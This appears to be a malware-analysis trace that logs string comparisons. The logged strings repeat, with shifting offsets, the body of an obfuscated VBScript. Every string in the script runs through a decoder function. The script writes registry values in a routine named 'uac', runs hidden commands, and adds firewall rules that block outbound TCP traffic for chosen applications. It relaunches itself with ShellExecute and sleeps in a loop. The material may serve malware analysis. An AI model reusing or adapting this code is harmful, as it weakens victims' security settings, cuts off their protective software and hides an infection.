bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.370] wcsncmp (_String1="ription = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.370] wcsncmp (_String1="iption = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.370] wcsncmp (_String1="ption = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0226.370] wcsncmp (_String1="tion = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.370] wcsncmp (_String1="ion = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add 